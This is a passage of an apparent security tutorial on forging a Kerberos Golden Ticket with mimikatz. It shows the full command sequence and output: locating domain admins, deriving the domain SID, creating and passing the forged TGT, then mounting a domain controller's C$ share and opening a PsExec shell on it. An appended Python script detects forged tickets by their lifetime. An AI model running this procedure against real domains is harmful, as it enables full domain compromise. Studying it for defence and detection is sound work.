Username that we'd like to impersonate
As you can see, exploiting this architectural flaw is not trivial: we need the NTLM hash of the krbtgt account, and getting it means compromising a Domain Controller first. But once that is done we can play with it for a long time, because the krbtgt password is never rotated automatically; it only changes when an administrator resets it (and since the KDC also accepts tickets made with the previous krbtgt key, the reset has to be done twice before forged tickets stop working).
As you may know, mimikatz can dump and replay existing tickets on Windows (pass-the-ticket): once we have access to a server or workstation and dump its tickets, we can replay them on another computer and get access to the same resources. See Google for more info.
Attack
When we have everything from the list above, we can create a new TGT with mimikatz that grants us access to anything in the domain. Let's see an example:
First we look for a domain administrator:
C:\Users\evilhacker>net group "domain admins" /domain
The request will be processed at a domain controller for domain ctu.domain.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator schema.Admin Jack.Bauer
Administrator is good for us, so we will create a TGT with the krbtgt account's NTLM hash and make it look as if Administrator had asked for access to a share. Next we need the domain SID. The easiest way to get it is "whoami /user" and remove the last part of the SID (the account's RID); or, if we have PsTools, PsGetsid.exe comes in handy:
C:\Users\evilhacker\Documents\mimikatz>PsGetsid.exe CTU.DOMAIN
PsGetSid v1.44 - Translates SIDs to names and vice versa
Copyright (C) 1999-2008 Mark Russinovich
Sysinternals - www.sysinternals.com
SID for CTU.DOMAIN\CTU.DOMAIN:
S-1-1-12-123456789-1234567890-123456789
Now we have everything to start the attack. First we list the existing Kerberos tickets; if there are any we can clear them with the purge command (not strictly necessary), then we create the Golden Ticket and pass it into the current session. (The SID and krbtgt hash below are obviously placeholders: a real domain SID starts with S-1-5-21- and a real NTLM hash is 32 hex digits.)
C:\Users\evilhacker\Documents\mimikatz>mimikatz.exe
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Jan 21 2014 15:06:17)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 14 modules * * */
mimikatz # kerberos::list
[00000000] - 17
Start/End/MaxRenew: 1/24/2014 12:46:49 PM ; 1/24/2014 9:23:28 PM ; 1/31/2014 11:23:28 AM
Server Name : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
Client Name : evilhacker @ CTU.DOMAIN
Flags 60a00000 : pre_authent ; renewable ; forwarded ; forwardable ;
...
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
mimikatz # kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
Admin : Administrator
Domain : CTU.DOMAIN
SID : S-1-1-12-123456789-1234567890-123456789
krbtgt : deadbeefboobbabe003133700009999
Ticket : Administrator.kiribi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
mimikatz # kerberos::ptt Administrator.kiribi
Ticket 'Administrator.kiribi' successfully submitted for current session
mimikatz # kerberos::list
[00000000] - 17
Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034 12:52:13 PM
Server Name : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
Client Name : Administrator @ CTU.DOMAIN
Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;
mimikatz # kerberos::tgt
Keberos TGT of current session :
Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034 12:52:13 PM
Service Name (02) : krbtgt ; CTU.DOMAIN; @ CTU.DOMAIN
Target Name (--) : @ CTU.DOMAIN
Client Name (01) : Administrator ; @ CTU.DOMAIN
Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;
Session Key (17) : 5b 1a f2 fb f2 4d 2c 70 9c 3f 36 80 82 0c 23 37
Ticket (00 - 17) : [...]
(NULL session key means allowtgtsessionkey is not set to 1)
Now you can mount any share or use any RPC-related tool that you like; the forged TGT is used transparently for every Kerberos authentication from this session. Note the validity of the ticket in the listing above: 10 years, which is the mimikatz default and far beyond the 10-hour maximum a DC would issue under the default Kerberos policy, so an unusually long-lived TGT is one of the few things that gives a Golden Ticket away on the client side.
C:\Users\evilhacker\Documents\mimikatz>net use i: \\dc01.ctu.domain\c$
The command completed successfully.
C:\Users\evilhacker\Documents\mimikatz>net use
New connections will be remembered.
Status       Local     Remote                      Network
-------------------------------------------------------------------------------
OK           I:        \\dc01.ctu.domain\c$        Microsoft Windows Network
The command completed successfully.
OR
C:\Users\evilhacker\Documents\pstools>PsExec.exe \\dc01.ctu.domain\ cmd.exe
PsExec v2.0 - Execute processes remotely
Copyright (C) 2001-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
DC01
C:\Windows\system32>exit
cmd.exe exited on dc01.ctu.domain\ with error code 0.
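Two steps of the procedure above are worth turning into something checkable: deriving the domain SID from a "whoami /user" style SID, and reading a kerberos::list dump so that the 10-year lifetime of the passed ticket stands out. The following Python is an added example, not part of the original post or of mimikatz. It parses kerberos::list output into ticket records and flags a TGT whose lifetime or renewal window exceeds the Active Directory default Kerberos policy (10 hours / 7 days) or whose client name is not the logged-on user. The two sample listings are reconstructed from the transcript above with the wrapped Start/End/MaxRenew lines rejoined; the policy limits and the "evilhacker" logged-on user are assumptions.

```python
"""Parse mimikatz kerberos::list output and flag Golden Ticket indicators.

Added example, not part of the original post or of mimikatz. Sample output is
reconstructed from the transcript in the post; policy limits are the Active
Directory defaults (assumption: the domain has not changed them).
"""
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Default Domain Policy Kerberos settings (assumed unchanged).
MAX_TGT_LIFETIME = timedelta(hours=10)
MAX_RENEW_LIFETIME = timedelta(days=7)

# Constructed samples: kerberos::list before and after kerberos::ptt.
SAMPLE_BEFORE = """\
[00000000] - 17
   Start/End/MaxRenew: 1/24/2014 12:46:49 PM ; 1/24/2014 9:23:28 PM ; 1/31/2014 11:23:28 AM
   Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
   Client Name       : evilhacker @ CTU.DOMAIN
   Flags 60a00000    : pre_authent ; renewable ; forwarded ; forwardable ;
"""
SAMPLE_AFTER = """\
[00000000] - 17
   Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034 12:52:13 PM
   Server Name       : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
   Client Name       : Administrator @ CTU.DOMAIN
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
"""

HEADER_RE = re.compile(r"^\[([0-9a-fA-F]+)\] - (\d+)$")  # "[00000000] - 17"
TIME_FMT = "%m/%d/%Y %I:%M:%S %p"                        # "1/24/2014 12:46:49 PM"


@dataclass
class Ticket:
    index: int
    etype: int
    start: datetime
    end: datetime
    max_renew: datetime
    server: str = ""
    client: str = ""
    flags: set = field(default_factory=set)

    @property
    def is_tgt(self) -> bool:
        return self.server.startswith("krbtgt/")


def domain_sid_from_user_sid(user_sid: str) -> str:
    """Drop the RID from a domain account SID, as the post does with `whoami /user`.
    Domain account SIDs look like S-1-5-21-<a>-<b>-<c>-<rid>; anything else is rejected."""
    parts = user_sid.strip().split("-")
    if len(parts) != 8 or parts[:4] != ["S", "1", "5", "21"] or not all(p.isdigit() for p in parts[1:]):
        raise ValueError(f"not a domain account SID: {user_sid!r}")
    return "-".join(parts[:-1])


def parse_kerberos_list(text: str) -> list:
    """Turn a kerberos::list dump into Ticket records (one per [index] header)."""
    tickets, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        header = HEADER_RE.match(line)
        if header:
            if current:
                tickets.append(Ticket(**current))
            current = {"index": int(header.group(1), 16), "etype": int(header.group(2))}
            continue
        if current is None or ":" not in line:
            continue
        label, value = (s.strip() for s in line.split(":", 1))  # label precedes the first ':'
        if label == "Start/End/MaxRenew":
            start, end, renew = (datetime.strptime(v.strip(), TIME_FMT) for v in value.split(";"))
            current.update(start=start, end=end, max_renew=renew)
        elif label == "Server Name":
            current["server"] = value
        elif label == "Client Name":
            current["client"] = value
        elif label.startswith("Flags"):
            current["flags"] = {f.strip() for f in value.split(";") if f.strip()}
    if current:
        tickets.append(Ticket(**current))
    return tickets


def golden_ticket_indicators(t: Ticket, logged_on_user: str) -> list:
    """Heuristics separating the forged TGT from a KDC-issued one. The client-name
    check alone is weak (runas /netonly causes the same mismatch), but a TGT valid
    for years cannot have been issued by a KDC honouring default policy."""
    findings = []
    lifetime, renew = t.end - t.start, t.max_renew - t.start
    if lifetime > MAX_TGT_LIFETIME:
        findings.append(f"lifetime {lifetime} exceeds policy maximum {MAX_TGT_LIFETIME}")
    if renew > MAX_RENEW_LIFETIME:
        findings.append(f"renewal window {renew} exceeds policy maximum {MAX_RENEW_LIFETIME}")
    if t.is_tgt and t.client.split("@")[0].strip().lower() != logged_on_user.lower():
        findings.append(f"TGT client {t.client!r} is not the logged-on user {logged_on_user!r}")
    return findings


def scan(text: str, logged_on_user: str) -> dict:
    """Map ticket index -> indicator list for every ticket in a kerberos::list dump."""
    return {t.index: golden_ticket_indicators(t, logged_on_user) for t in parse_kerberos_list(text)}


if __name__ == "__main__":
    print("domain SID:", domain_sid_from_user_sid("S-1-5-21-1111111111-2222222222-3333333333-1105"))
    for name, sample in (("before ptt", SAMPLE_BEFORE), ("after ptt", SAMPLE_AFTER)):
        print(name, scan(sample, "evilhacker"))
```

Run as a script, the "before ptt" listing produces no findings, while the passed Golden Ticket is flagged three times: a 10-year lifetime, a 20-year renewal window, and a TGT for Administrator in evilhacker's session. The lifetime check is the one to rely on; the client-name check is only corroboration.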
Some additional notes: